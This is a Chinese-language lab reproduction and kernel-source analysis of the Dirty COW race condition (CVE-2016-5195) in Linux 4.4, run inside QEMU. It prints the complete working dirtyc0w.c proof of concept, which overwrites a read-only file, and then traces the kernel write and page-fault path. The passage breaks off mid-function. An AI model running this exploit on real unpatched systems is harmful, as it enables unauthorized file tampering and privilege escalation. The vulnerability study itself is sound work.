CVE-2016-5195_dirtycow

环境准备

内核源码下载与解压

sudo wget https://mirror.tuna.tsinghua.edu.cn/kernel/v4.x/linux-4.4.tar.xz
xz -d linux-4.4.tar.xz
tar -xvf linux-4.4.tar
cd linux-4.4

编译

sudo make bzImage -j4

这里的文件系统就随便拿了CTF内核题目的一个rootfs.cpio，启动脚本boot.sh也是题目里给的，在自己创建的core文件夹里解压后，把exp编译好了丢进去，改一下init文件，然后重新打包，mv到主目录；

mkdir core
mv rootfs.cpio core/rootf.cpio.gz
cd core
gunzip rootfs.cpio.gz
cpio -idmv > rootfs.cpio
cp pathto/dirtyc0w.c .
gcc -pthread -static dirtyc0w.c -o dirtyc0w
vim init
find . | cpio -o --format=newc > rootfs.cpio
mv rootfs.cpio ..

回到该CVE的主目录，把编译好的，在/linux-4.4/arch/x86/boot/中的bzImage，丢到当前目录；

cd ..
cp linux-4.4/arch/x86/boot/bzImage .
vim boot.sh

简单复现

启动qemu；

sudo ./boot.sh

// boot.sh
#!/bin/bash
qemu-system-x86_64 -initrd rootfs.cpio -kernel bzImage -append 'console=ttyS0 root=/dev/ram oops=panic panic=1' -enable-kvm -monitor /dev/null -m 64M --nographic  -smp cores=1,threads=1 -cpu kvm64,+smep

查看当前用户状态和文件；

/ $ id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
/ $ uname -a
Linux (none) 4.4.0 #1 SMP Sat Nov 20 21:21:06 CST 2021 x86_64 GNU/Linux
/ $ ls -l foo
-r-----r--    1 ctf      ctf             15 Nov 20 13:40 foo
/ $ cat foo
this_is_a_test

执行dirtyc0w

/ $ ./dirtyc0w foo 12345678912345
mmap 7f1daeca3000

madvise 0

procselfmem 1400000000

/ $ cat foo
12345678912345

可以看到只读文件foo内容已经被修改了；

前置知识

Copy-On-Write

假设存在两个进程p1, p2，p2为p1调用fork产生。此时，p1和p2共用一块空间，当对这个空间进行修改时，才会再拷贝一份；

这主要是因为：

子进程中往往会调用execve()相关的函数实现具体的功能，例如一个进程想要执行另一个程序，先调用fork将自身拷贝，然后其中一个拷贝（通常是子进程）调用execve将自身替换成新的程序进程。当替换成功后，程序执行流就交给了这个新的进程，就如glibc pwn中hijack malloc_hook到execve上。
fork实际上创建了一个与父进程pid不一样的副本，如果此时，把整个父进程的数据完整拷贝到子进程的新空间，而execve相关函数在执行时，会直接替换掉当前进程的地址空间，意味着拷贝是无效的，需要进行效率上的优化。

madvise

int madvise(void *addr, size_t length, int advise);

该函数功能为：在从 addr 指定的地址开始，长度等于 len 参数值的范围内，该区域的用户虚拟内存应遵循特定的使用模式。

advise有如下选择：

MADV_ACCESS_DEFAULT
此标志将指定范围的内核预期访问模式重置为缺省设置。
 
MADV_ACCESS_LWP
此标志通知内核，移近指定地址范围的下一个 LWP 就是将要访问此范围次数最多的 LWP。内核将相应地为此范围和 LWP 分配内存和其他资源。
 
MADV_ACCESS_MANY
此标志建议内核，许多进程或 LWP 将在系统内随机访问指定的地址范围。内核将相应地为此范围分配内存和其他资源。
 
MADV_DONTNEED
此系统调用相当于通知内核addr～addr+len的内存在接下来不再使用，内核将释放掉这一块内存以节省空间，相应的页表项也会被置空。

POC

/*
####################### dirtyc0w.c #######################
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -pthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000
####################### dirtyc0w.c #######################
*/
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>
 
void *map;
int f;
struct stat st;
char *name;
 
void *madviseThread(void *arg)
{
  char *str;
  str=(char*)arg;
  int i,c=0;
  for(i=0;i<100000000;i++)
  {
/*
You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661
> This is achieved by racing the madvise(MADV_DONTNEED) system call
> while having the page of the executable mmapped in memory.
*/
    c+=madvise(map,100,MADV_DONTNEED);
  }
  printf("madvise %d\n\n",c);
}
 
void *procselfmemThread(void *arg)
{
  char *str;
  str=(char*)arg;
/*
You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
>  The in the wild exploit we are aware of doesn't work on Red Hat
>  Enterprise Linux 5 and 6 out of the box because on one side of
>  the race it writes to /proc/self/mem, but /proc/self/mem is not
>  writable on Red Hat Enterprise Linux 5 and 6.
*/
  int f=open("/proc/self/mem",O_RDWR);
  int i,c=0;
  for(i=0;i<100000000;i++) {
/*
You have to reset the file pointer to the memory position.
*/
    lseek(f,(uintptr_t) map,SEEK_SET);
    c+=write(f,str,strlen(str));
  }
  printf("procselfmem %d\n\n", c);
}
 
 
int main(int argc,char *argv[])
{
/*
You have to pass two arguments. File and Contents.
*/
  if (argc<3) {
  (void)fprintf(stderr, "%s\n",
      "usage: dirtyc0w target_file new_content");
  return 1; }
  pthread_t pth1,pth2;
/*
You have to open the file in read only mode.
*/
  f=open(argv[1],O_RDONLY);
  fstat(f,&st);
  name=argv[1];
/*
You have to use MAP_PRIVATE for copy-on-write mapping.
> Create a private copy-on-write mapping.  Updates to the
> mapping are not visible to other processes mapping the same
> file, and are not carried through to the underlying file.  It
> is unspecified whether changes made to the file after the
> mmap() call are visible in the mapped region.
*/
/*
You have to open with PROT_READ.
*/
  map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
  printf("mmap %zx\n\n",(uintptr_t) map);
/*
You have to do it on two threads.
*/
  pthread_create(&pth1,NULL,madviseThread,argv[1]);
  pthread_create(&pth2,NULL,procselfmemThread,argv[2]);
/*
You have to wait for the threads to finish.
*/
  pthread_join(pth1,NULL);
  pthread_join(pth2,NULL);
  return 0;
}

复现过程

只读文件生成与状态保存

首先创建一个foo的只读文件；

sudo -s
echo this_is_a_test > foo
chmod 0404 foo
ls -ahl | grep foo
-r-----r--   1 root  root    15 Nov 20 21:40 foo

以read-only的形式打开，将文件状态存储到stat结构体中，并且用name变量记录fd；

f=open(argv[1],O_RDONLY);
fstat(f,&st);
name=argv[1];

mmap 私有cow映射到用户空间

接着，使用mmap将此文件的内容 以私有的写时复制 映射到了用户空间。

// void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);
  map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);     
  printf("mmap %zx\n\n",(uintptr_t) map);

addr，映射地址，NULL代表让内核选取一个合适的地址。
length代表要映射的进程地址空间的大小。这里是文件的大小st_size。
prot代表映射区域的读写属性。这里是只读。
flags设置内存映射的属性。这里是 MAP_PRIVATE 创建一个私有的写时复制的映射。（多个process可以通过私有映射访问同一个文件，并且修改后 不会同步到磁盘文件中 ）
fd代表这是一个文件映射。
offset是指在文件映射中的偏移量。

返回一个映射空间地址map；

启动线程

启动两个线程madviseThread和procselfmemThread：

pthread_create(&pth1,NULL,madviseThread,argv[1]);
pthread_create(&pth2,NULL,procselfmemThread,argv[2]);

madviseThread

对于madviseThread而言，其不断地掉用100000000次，设置内核的map到map+100的内存空间为不再使用的可清除状态；

void *madviseThread(void *arg)
{
  char *str;
  str=(char*)arg;
  int i,c=0;
  for(i=0;i<100000000;i++)
  {
/*
You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661
> This is achieved by racing the madvise(MADV_DONTNEED) system call
> while having the page of the executable mmapped in memory.
*/
    c+=madvise(map,100,MADV_DONTNEED);
  }
  printf("madvise %d\n\n",c);
}

procselfmemThread

对于procselfmemThread而言：

void *procselfmemThread(void *arg)
{
  char *str;
  str=(char*)arg;
/*
You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
>  The in the wild exploit we are aware of doesn't work on Red Hat
>  Enterprise Linux 5 and 6 out of the box because on one side of
>  the race it writes to /proc/self/mem, but /proc/self/mem is not
>  writable on Red Hat Enterprise Linux 5 and 6.
*/
  int f=open("/proc/self/mem",O_RDWR);
  int i,c=0;
  for(i=0;i<100000000;i++) {
/*
You have to reset the file pointer to the memory position.
*/
    lseek(f,(uintptr_t) map,SEEK_SET);
    c+=write(f,str,strlen(str));
  }
  printf("procselfmem %d\n\n", c);
}

首先是以可读写的状态打开了/proc/self/mem，循环调用100000000次的lseek和write；

/proc/self/mem是进程的内存空间，如果修改了该文件相当于修改了当前进程的内存，但是没有被正确映射的内存空间是无法读取的，只有读取的偏移值是被映射的区域才能正确读取内存内容，如：

$ sudo cat /proc/6412/mem
cat: /proc/6412/mem: Input/output error

因此使用了lseek调整偏移写的位置；

off_t lseek(int fd, off_t offset, int whence);

offset参数传递了map，将位置调整到mmap返回的位置（也就是文件被映射的位置），mmap时，只有读的权限。

whence参数传递了SEEK_SET ，指定offset，即映射地址map 为新的读写位置。

之后进行100000000次write操作来试图向该内存写入内容。

c+=write(f,str,strlen(str));

这两个线程是竞争的关系；

一个设置了map到map+offset的内存空间为不再可用待清除的状态，一个不断地调用写操作，希望往map里写入内容；

竞争

write执行流

当调用write(f,str,strlen(str))时，存在如下的调用流程：

write -> 
sys_write -> 
SYSCALL_DEFINE3 ->
vfs_write ->
__vffs_write ->
mem_write ->
mem_wr ->
__get_free_pages

sys=>vfs=>mem

sys_write和SYSCALL_DEFINE3的定义位于include/linux/syscalls.h中；

#define SYSCALL_DEFINE3(name, ...) SYSCALL_DEFINEx(3, _##name, __VA_ARGS__)

asmlinkage long sys_write(unsigned int fd, const char __user *buf, size_t count);

对SYSCALL_DEFINE3和vfs_write的描述在fd/read_write.c中；

SYSCALL_DEFINE3(write, unsigned int, fd, const char __user *, buf,
		size_t, count)
{
	struct fd f = fdget_pos(fd);         // 获得文件
	ssize_t ret = -EBADF;                // 初始化ret
	if (f.file) {
		loff_t pos = file_pos_read(f.file);   // 获取文件位置
		ret = vfs_write(f.file, buf, count, &pos);   // 调用vfs_write
		if (ret >= 0)
			file_pos_write(f.file, pos);
		fdput_pos(f);
	}
	return ret;
}

ssize_t vfs_write(struct file *file, const char __user *buf, size_t count, loff_t *pos)
{
	ssize_t ret;
    // 判断文件可写
	if (!(file->f_mode & FMODE_WRITE))
		return -EBADF;
	if (!(file->f_mode & FMODE_CAN_WRITE))
		return -EINVAL;
	if (unlikely(!access_ok(VERIFY_READ, buf, count)))
		return -EFAULT;
	ret = rw_verify_area(WRITE, file, pos, count);   // rw_verify_area()进行验证
	if (ret >= 0) {
		count = ret;
		file_start_write(file);  // 开始写
		ret = __vfs_write(file, buf, count, pos);  // 调用__vfs_write()
		if (ret > 0) {
			fsnotify_modify(file);
			add_wchar(current, ret);
		}
		inc_syscw(current);
		file_end_write(file);    // 结束写
	}
	return ret;
}

int rw_verify_area(int read_write, struct file *file, const loff_t *ppos, size_t count)
{
	struct inode *inode;
	loff_t pos;
	int retval = -EINVAL;

	inode = file_inode(file);
	if (unlikely((ssize_t) count < 0))
		return retval;
	pos = *ppos;
	if (unlikely(pos < 0)) {
		if (!unsigned_offsets(file))
			return retval;
		if (count >= -pos) /* both values are in 0..LLONG_MAX */
			return -EOVERFLOW;
	} else if (unlikely((loff_t) (pos + count) < 0)) {
		if (!unsigned_offsets(file))
			return retval;
	}

	if (unlikely(inode->i_flctx && mandatory_lock(inode))) {
		retval = locks_mandatory_area(
			read_write == READ ? FLOCK_VERIFY_READ : FLOCK_VERIFY_WRITE,
			inode, file, pos, count);
		if (retval < 0)
			return retval;
	}
	retval = security_file_permission(file,
				read_write == READ ? MAY_READ : MAY_WRITE);
	if (retval)
		return retval;
	return count > MAX_RW_COUNT ? MAX_RW_COUNT : count;
}

__vfs_write同样位于fs/read_write.c中；

ssize_t __vfs_write(struct file *file, const char __user *p, size_t count,
		    loff_t *pos)
{
	if (file->f_op->write)
		return file->f_op->write(file, p, count, pos);
	else if (file->f_op->write_iter)
		return new_sync_write(file, p, count, pos);
	else
		return -EINVAL;
}

在fs/proc/base.c中，有mem_write及其调用mem_rw，由mem_rw调用__get_free_pages；

static const struct file_operations proc_mem_operations = {
	.llseek		= mem_lseek,
	.read		= mem_read,
	.write		= mem_write,
	.open		= mem_open,
	.release	= mem_release,
};

static ssize_t mem_write(struct file *file, const char __user *buf,
			 size_t count, loff_t *ppos)
{
	return mem_rw(file, (char __user*)buf, count, ppos, 1);
}

mem_rw

需要重点分析mem_rw函数；

static ssize_t mem_rw(struct file *file, char __user *buf,
            size_t count, loff_t *ppos, int write)            //write=1
{
    struct mm_struct *mm = file->private_data;   
    unsigned long addr = *ppos;
    ssize_t copied;
    char *page;
 
    if (!mm)                   // 创建mm_struct结构体不成功则返回0
        return 0;
 
    page = (char *)__get_free_page(GFP_TEMPORARY);        //获取一个free page,返回指向新页面的指针并将页面清零
    if (!page)                  // 如果申请空页失败，则返回-ENOMEM
        return -ENOMEM;       
 
    copied = 0;
    if (!atomic_inc_not_zero(&mm->mm_users))//atomic_inc_not_zero(v)用于将atomic_t变量*v加1，并测试加1后的*v是否不为零，如果不为零则返回真.因此这里是将mm->mm_users+1，测试是否为0
        goto free;                            //为0的话就free掉
 
    while (count > 0) {                        //写入的size大于0进入while
 
        int this_len = min_t(int, count, PAGE_SIZE);    //类型为int。count返回PAGE_SIZE中更小的那个，防止页不够写
 
        if (write && copy_from_user(page, buf, this_len)) {   // 将buf拷贝this_size长度到新申请的page上
            copied = -EFAULT;
            break;
        }
 
        this_len = access_remote_vm(mm, addr, page, this_len, write);    //write=1,这里this_len是拷贝的长度
        
        if (!this_len) {
            if (!copied)
                copied = -EIO;  // 拷贝失败返回-EIO
            break;
        }
 
        if (!write && copy_to_user(buf, page, this_len)) {
            copied = -EFAULT;
            break;
        }
 
        buf += this_len;
        addr += this_len;
        copied += this_len;
        count -= this_len;
    }
    *ppos = addr;
 
    mmput(mm);
 
free:
    free_page((unsigned long) page);            //free申请出来的页
    return copied;
}

mm_struct

首先生成一个新的mm_struct结构体；

struct mm_struct {
 
    //指向线性区对象的链表头
    struct vm_area_struct * mmap;       /* list of VMAs */
    //指向线性区对象的红黑树
    struct rb_root mm_rb;
    //指向最近找到的虚拟区间
    struct vm_area_struct * mmap_cache; /* last find_vma result */
 
    //用来在进程地址空间中搜索有效的进程地址空间的函数
    unsigned long (*get_unmapped_area) (struct file *filp,
                unsigned long addr, unsigned long len,
                unsigned long pgoff, unsigned long flags);
 
       unsigned long (*get_unmapped_exec_area) (struct file *filp,
                unsigned long addr, unsigned long len,
                unsigned long pgoff, unsigned long flags);
 
    //释放线性区时调用的方法，         
    void (*unmap_area) (struct mm_struct *mm, unsigned long addr);
 
    //标识第一个分配文件内存映射的线性地址
    unsigned long mmap_base;        /* base of mmap area */
 
 
    unsigned long task_size;        /* size of task vm space */
    /*
     * RHEL6 special for bug 790921: this same variable can mean
     * two different things. If sysctl_unmap_area_factor is zero,
     * this means the largest hole below free_area_cache. If the
     * sysctl is set to a positive value, this variable is used
     * to count how much memory has been munmapped from this process
     * since the last time free_area_cache was reset back to mmap_base.
     * This is ugly, but necessary to preserve kABI.
     */
    unsigned long cached_hole_size;
 
    //内核进程搜索进程地址空间中线性地址的空间空间
    unsigned long free_area_cache;      /* first hole of size cached_hole_size or larger */
 
    //指向页表的目录
    pgd_t * pgd;
 
    //共享进程时的个数
    atomic_t mm_users;          /* How many users with user space? */
 
    //内存描述符的主使用计数器，采用引用计数的原理，当为0时代表无用户再次使用
    atomic_t mm_count;          /* How many references to "struct mm_struct" (users count as 1) */
 
    //线性区的个数
    int map_count;              /* number of VMAs */
 
    struct rw_semaphore mmap_sem;
 
    //保护任务页表和引用计数的锁
    spinlock_t page_table_lock;     /* Protects page tables and some counters */
 
    //mm_struct结构，第一个成员就是初始化的mm_struct结构，
    struct list_head mmlist;        /* List of maybe swapped mm's.  These are globally strung
                         * together off init_mm.mmlist, and are protected
                         * by mmlist_lock
                         */
 
    /* Special counters, in some configurations protected by the
     * page_table_lock, in other configurations by being atomic.
     */
 
    mm_counter_t _file_rss;
    mm_counter_t _anon_rss;
    mm_counter_t _swap_usage;
 
    //进程拥有的最大页表数目
    unsigned long hiwater_rss;  /* High-watermark of RSS usage */、
    //进程线性区的最大页表数目
    unsigned long hiwater_vm;   /* High-water virtual memory usage */
 
    //进程地址空间的大小，锁住无法换页的个数，共享文件内存映射的页数，可执行内存映射中的页数
    unsigned long total_vm, locked_vm, shared_vm, exec_vm;
    //用户态堆栈的页数，
    unsigned long stack_vm, reserved_vm, def_flags, nr_ptes;
    //维护代码段和数据段
    unsigned long start_code, end_code, start_data, end_data;
    //维护堆和栈
    unsigned long start_brk, brk, start_stack;
    //维护命令行参数，命令行参数的起始地址和最后地址，以及环境变量的起始地址和最后地址
    unsigned long arg_start, arg_end, env_start, env_end;
 
    unsigned long saved_auxv[AT_VECTOR_SIZE]; /* for /proc/PID/auxv */
 
    struct linux_binfmt *binfmt;
 
    cpumask_t cpu_vm_mask;
 
    /* Architecture-specific MM context */
    mm_context_t context;
 
    /* Swap token stuff */
    /*
     * Last value of global fault stamp as seen by this process.
     * In other words, this value gives an indication of how long
     * it has been since this task got the token.
     * Look at mm/thrash.c
     */
    unsigned int faultstamp;
    unsigned int token_priority;
    unsigned int last_interval;
 
    //线性区的默认访问标志
    unsigned long flags; /* Must use atomic bitops to access the bits */
 
    struct core_state *core_state; /* coredumping support */
#ifdef CONFIG_AIO
    spinlock_t      ioctx_lock;
    struct hlist_head   ioctx_list;
#endif
#ifdef CONFIG_MM_OWNER
    /*
     * "owner" points to a task that is regarded as the canonical
     * user/owner of this mm. All of the following must be true in
     * order for it to be changed:
     *
     * current == mm->owner
     * current->mm != mm
     * new_owner->mm == mm
     * new_owner->alloc_lock is held
     */
    struct task_struct *owner;
#endif
 
#ifdef CONFIG_PROC_FS
    /* store ref to file /proc/<pid>/exe symlink points to */
    struct file *exe_file;
    unsigned long num_exe_file_vmas;
#endif
#ifdef CONFIG_MMU_NOTIFIER
    struct mmu_notifier_mm *mmu_notifier_mm;
#endif
#ifdef CONFIG_TRANSPARENT_HUGEPAGE
    pgtable_t pmd_huge_pte; /* protected by page_table_lock */
#endif
    /* reserved for Red Hat */
#ifdef __GENKSYMS__
    unsigned long rh_reserved[2];
#else
    /* How many tasks sharing this mm are OOM_DISABLE */
    union {
        unsigned long rh_reserved_aux;
        atomic_t oom_disable_count;
    };
 
    /* base of lib map area (ASCII armour) */
    unsigned long shlib_base;
#endif
};

mm_struct与task_struct的关系如下：

mm_struct

如果加上vma struct，有：

其中重要的几个：

mm_users：表示正在引用该地址空间的thread数目。是一个线程级的计数器。
atomic_t mm_users; /* How many users with user space? */

mm_count：表示这个地址空间被内核线程引用的次数

atomic_t mm_count;			/* How many references to "struct mm_struct" (users count as 1) */

当 mm_user 和 mm_count都等于0的时候才会free这一块mm_struct，代表此时既没有用户级进程使用此地址空间，也没有内核级线程引用。

__get_free_pages

接着申请一个新的页面，返回指向新页面的指针并将页面清零；

access_remote_vm

在mem_rw第30行，将会调用access_remote_vm函数；

this_len = access_remote_vm(mm, addr, page, this_len, write);      //write=1

该函数位于/mm/memory.c中；

/**
 * access_remote_vm - access another process' address space
 * @mm:		the mm_struct of the target address space
 * @addr:	start address to access
 * @buf:	source or destination buffer
 * @len:	number of bytes to transfer
 * @write:	whether the access is a write
 *
 * The caller must hold a reference on @mm.
 *
 * Return: number of bytes copied from source to destination.
 */
int access_remote_vm(struct mm_struct *mm, unsigned long addr,
		void *buf, int len, int write)
{
	return __access_remote_vm(NULL, mm, addr, buf, len, write);
}

__access_remote_vm

调用函数__access_remote_vm，返回的是最后拷贝的长度；

static int __access_remote_vm(struct task_struct *tsk, struct mm_struct *mm,
		unsigned long addr, void *buf, int len, int write)
{
	struct vm_area_struct *vma;
	void *old_buf = buf;

	down_read(&mm->mmap_sem);
	/* ignore errors, just check how much was successfully transferred */
	while (len) {
		int bytes, ret, offset;
		void *maddr;
		struct page *page = NULL;

		ret = get_user_pages(tsk, mm, addr, 1,   // 调用get_user_pages,patch后是get_user_pages_remote
				write, 1, &page, &vma);
		if (ret <= 0) {
#ifndef CONFIG_HAVE_IOREMAP_PROT
			break;
#else
			/*
			 * Check if this is a VM_IO | VM_PFNMAP VMA, which
			 * we can access using slightly different code.
			 */
			vma = find_vma(mm, addr);
			if (!vma || vma->vm_start > addr)
				break;
			if (vma->vm_ops && vma->vm_ops->access)
				ret = vma->vm_ops->access(vma, addr, buf,
							  len, write);
			if (ret <= 0)
				break;
			bytes = ret;
#endif
		} else {
			bytes = len;
			offset = addr & (PAGE_SIZE-1);
			if (bytes > PAGE_SIZE-offset)
				bytes = PAGE_SIZE-offset;

			maddr = kmap(page);
			if (write) {
				copy_to_user_page(vma, page, addr,
						  maddr + offset, buf, bytes);
				set_page_dirty_lock(page);
			} else {
				copy_from_user_page(vma, page, addr,
						    buf, maddr + offset, bytes);
			}
			kunmap(page);
			page_cache_release(page);
		}
		len -= bytes;
		buf += bytes;
		addr += bytes;
	}
	up_read(&mm->mmap_sem);

	return buf - old_buf;
}

其中，get_user_pages -> __get_user_pages_locked -> __get_user_pages，这一系列调用是由于write系统调用在内核中会执行get_user_pages以获取需要写入的内存页。

__get_user_pages

位于/mm/gup.c中；

关于其注释

/**
 * __get_user_pages() - pin user pages in memory
 * @tsk:	task_struct of target task
 * @mm:		mm_struct of target mm
 * @start:	starting user address
 * @nr_pages:	number of pages from start to pin
 * @gup_flags:	flags modifying pin behaviour
 * @pages:	array that receives pointers to the pages pinned.
 *		Should be at least nr_pages long. Or NULL, if caller
 *		only intends to ensure the pages are faulted in.
 * @vmas:	array of pointers to vmas corresponding to each page.
 *		Or NULL if the caller does not require them.
 * @nonblocking: whether waiting for disk IO or mmap_sem contention
 *
 * Returns number of pages pinned. This may be fewer than the number
 * requested. If nr_pages is 0 or negative, returns 0. If no pages
 * were pinned, returns -errno. Each page returned must be released
 * with a put_page() call when it is finished with. vmas will only
 * remain valid while mmap_sem is held.
 *
 * Must be called with mmap_sem held.  It may be released.  See below.
 *
 * __get_user_pages walks a process's page tables and takes a reference to
 * each struct page that each user address corresponds to at a given
 * instant. That is, it takes the page that would be accessed if a user
 * thread accesses the given user virtual address at that instant.
 *
 * This does not guarantee that the page exists in the user mappings when
 * __get_user_pages returns, and there may even be a completely different
 * page there in some cases (eg. if mmapped pagecache has been invalidated
 * and subsequently re faulted). However it does guarantee that the page
 * won't be freed completely. And mostly callers simply care that the page
 * contains data that was valid *at some point in time*. Typically, an IO
 * or similar operation cannot guarantee anything stronger anyway because
 * locks can't be held over the syscall boundary.
 *
 * If @gup_flags & FOLL_WRITE == 0, the page must not be written to. If
 * the page is written to, set_page_dirty (or set_page_dirty_lock, as
 * appropriate) must be called after the page is finished with, and
 * before put_page is called.
 *
 * If @nonblocking != NULL, __get_user_pages will not wait for disk IO
 * or mmap_sem contention, and if waiting is needed to pin all pages,
 * *@nonblocking will be set to 0.  Further, if @gup_flags does not
 * include FOLL_NOWAIT, the mmap_sem will be released via up_read() in
 * this case.
 *
 * A caller using such a combination of @nonblocking and @gup_flags
 * must therefore hold the mmap_sem for reading only, and recognize
 * when it's been released.  Otherwise, it must be held for either
 * reading or writing and will not be released.
 *
 * In most cases, get_user_pages or get_user_pages_fast should be used
 * instead of __get_user_pages. __get_user_pages should be used only if
 * you need some special @gup_flags.
 */

关于其源码；

/*
 * __get_user_pages() - pin user pages in memory
 * @tsk:	task_struct of target task
 * @mm:		mm_struct of target mm
 * @start:	starting user address
 * @nr_pages:	number of pages from start to pin
 * @gup_flags:	flags modifying pin behaviour
 * @pages:	array that receives pointers to the pages pinned.
 *		Should be at least nr_pages long. Or NULL, if caller
 *		only intends to ensure the pages are faulted in.
 * @vmas:	array of pointers to vmas corresponding to each page.
 *		Or NULL if the caller does not require them.
 * @nonblocking: whether waiting for disk IO or mmap_sem contention
 *
 */
long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
        unsigned long start, unsigned long nr_pages,
        unsigned int gup_flags, struct page **pages,
        struct vm_area_struct **vmas, int *nonblocking)
{
    long i = 0;
    unsigned int page_mask;
    struct vm_area_struct *vma = NULL;
 
    if (!nr_pages)  // 检查起始页表是否存在，不存在则返回0
        return 0;
 
    VM_BUG_ON(!!pages != !!(gup_flags & FOLL_GET));
 
    /*
     * If FOLL_FORCE is set then do not force a full fault as the hinting
     * fault information is unrelated to the reference behaviour of a task
     * using the address space
     */
    if (!(gup_flags & FOLL_FORCE))     // 如果页不可写
        gup_flags |= FOLL_NUMA;     // 则标识为页错误类型
 
    do {
        struct page *page;
        unsigned int foll_flags = gup_flags;    //访问语义标志
        unsigned int page_increm;
 
        /* first iteration or cross vma bound */
        if (!vma || start >= vma->vm_end) { // 如果vma不存在或者用户起始地址大于等于vma的结束地址
            vma = find_extend_vma(mm, start);  // 则根据start找一个vma区域
            if (!vma && in_gate_area(mm, start)) {  //如果区域任然不存在并且不在Gate_addr-Gate_addr+2*pagesize范围内
                int ret;
                ret = get_gate_page(mm, start & PAGE_MASK, // 根据start去获取相应页
                        gup_flags, &vma,
                        pages ? &pages[i] : NULL);
                if (ret)  // 如果获取到了则调到该页
                    return i ? : ret;
                page_mask = 0;
                goto next_page;
            }
 
            if (!vma || check_vma_flags(vma, gup_flags))    // 检查flags，如果不满足条件
                return i ? : -EFAULT;
            if (is_vm_hugetlb_page(vma)) {    // 如果是大页表
                i = follow_hugetlb_page(mm, vma, pages, vmas,
                        &start, &nr_pages, i,
                        gup_flags); // 打印BUG错误信息
                continue;
            }
        }
retry:
        /*
         * If we have a pending SIGKILL, don't keep faulting pages and
         * potentially allocating memory.
         * 如果我们有一个挂起的SIGKILL，不用继续对页面进行错误处理并可能分配内存
         */
        if (unlikely(fatal_signal_pending(current)))
            return i ? i : -ERESTARTSYS;
        cond_resched();
        /**
 * follow_page_mask - look up a page descriptor from a user-virtual address
 * @vma: vm_area_struct mapping @address
 * @address: virtual address to look up
 * @flags: flags modifying lookup behaviour
 * @page_mask: on output, *page_mask is set according to the size of the page
 *
 * @flags can have FOLL_ flags set, defined in <linux/mm.h>
 *
 * Returns the mapped (struct page *), %NULL if no mapping exists, or
 * an error pointer if there is a mapping to something not represented
 * by a page descriptor (see also vm_normal_page()).
 */
        page = follow_page_mask(vma, start, foll_flags, &page_mask);
        // 这里返回了映射的物理页面，对应的参数有映射地址，页属性等
        if (!page) {            //当返回为NULL时
            // (a)页表中不存在物理页即缺页
            // (b)访问语义标志foll_flags对应的权限违反内存页的权限时，follow_page_mask返回值为NULL
            // 第一次是由于（a）原因
            // 第二次是由于（b）原因，对应的页表项指向的内存并没有写权限，所以返回NULL
            int ret;
            ret = faultin_page(tsk, vma, start, &foll_flags,
                    nonblocking);    //调用faultin_page处理，页错误处理
            switch (ret) {
            case 0:
                goto retry;
            case -EFAULT:
            case -ENOMEM:
            case -EHWPOISON:
                return i ? i : ret;
            case -EBUSY:
                return i;
            case -ENOENT:
                goto next_page;
            }
            BUG();  // 打印错误信息
        } else if (PTR_ERR(page) == -EEXIST) {
            /*
             * Proper page table entry exists, but no corresponding
             * struct page.
             */
            goto next_page;
        } else if (IS_ERR(page)) {
            return i ? i : PTR_ERR(page);
        }
        if (pages) {
            pages[i] = page;
            flush_anon_page(vma, page, start);
            flush_dcache_page(page);
            page_mask = 0;
        }
next_page:
        if (vmas) {
            vmas[i] = vma;
            page_mask = 0;
        }
        page_increm = 1 + (~(start >> PAGE_SHIFT) & page_mask);
        if (page_increm > nr_pages)
            page_increm = nr_pages;
        i += page_increm;
        start += page_increm * PAGE_SIZE;
        nr_pages -= page_increm;
    } while (nr_pages);
    return i;
}
EXPORT_SYMBOL(__get_user_pages);

其中有几个关键点。

访问语义标志foll_flags对应的权限违反内存页的权限时，follow_page_mask返回值为NULL，会触发对faultin_page的调用；

follow_page_mask函数的作用是查询页表获取虚拟地址对应的物理页，它将按照linux页表的四级结构所示依次向下调用四层函数；

struct page *follow_page_mask(struct vm_area_struct *vma,
			      unsigned long address, unsigned int flags,
			      unsigned int *page_mask)
{
	pgd_t *pgd;
	pud_t *pud;
	pmd_t *pmd;
	spinlock_t *ptl;
	struct page *page;
	struct mm_struct *mm = vma->vm_mm;

	*page_mask = 0;

	page = follow_huge_addr(mm, address, flags & FOLL_WRITE);
	if (!IS_ERR(page)) {
		BUG_ON(flags & FOLL_GET);
		return page;
	}

	pgd = pgd_offset(mm, address);
	if (pgd_none(*pgd) || unlikely(pgd_bad(*pgd)))
		return no_page_table(vma, flags);

	pud = pud_offset(pgd, address);
	if (pud_none(*pud))
		return no_page_table(vma, flags);
	if (pud_huge(*pud) && vma->vm_flags & VM_HUGETLB) {
		page = follow_huge_pud(mm, address, pud, flags);
		if (page)
			return page;
		return no_page_table(vma, flags);
	}
	if (unlikely(pud_bad(*pud)))
		return no_page_table(vma, flags);

	pmd = pmd_offset(pud, address);
	if (pmd_none(*pmd))
		return no_page_table(vma, flags);
	if (pmd_huge(*pmd) && vma->vm_flags & VM_HUGETLB) {
		page = follow_huge_pmd(mm, address, pmd, flags);
		if (page)
			return page;
		return no_page_table(vma, flags);
	}
	if ((flags & FOLL_NUMA) && pmd_protnone(*pmd))
		return no_page_table(vma, flags);
	if (pmd_trans_huge(*pmd)) {
		if (flags & FOLL_SPLIT) {
			split_huge_page_pmd(vma, address, pmd);
			return follow_page_pte(vma, address, pmd, flags);
		}
		ptl = pmd_lock(mm, pmd);
		if (likely(pmd_trans_huge(*pmd))) {
			if (unlikely(pmd_trans_splitting(*pmd))) {
				spin_unlock(ptl);
				wait_split_huge_page(vma->anon_vma, pmd);
			} else {
				page = follow_trans_huge_pmd(vma, address,
							     pmd, flags);
